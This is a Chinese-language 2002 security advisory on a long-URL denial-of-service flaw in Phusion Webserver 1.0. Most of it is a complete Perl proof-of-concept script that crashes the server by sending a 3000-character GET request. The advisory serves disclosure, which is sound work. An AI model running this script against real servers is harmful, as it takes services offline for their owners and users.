Phusion Webserver处理超长URL存在拒绝服务攻击发布时间:2002-02-22 更新时间:2002-02-22 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:4118 受影响系统 BBShareware.Com Phusion Webserver 1.0详细描述 Phusion Webserver 是运行在Microsoft windows下的HTTP服务程序。 其中通过请求超过3000+字节的URL可以导致HTTP WEB服务程序产生拒绝服务攻击, 停止响应其他服务。 测试代码 #!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_DoS.pl -s <server> # # Example: # # perl -x Phusion_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} 解决方案 尚无 相关信息 Alex Hernandez <al3xhernandez@ureach.com>. 参考:http://online.securityfocus.com/archive/1/256838 相关主页:http://www.bbshareware.com/phusion/ |
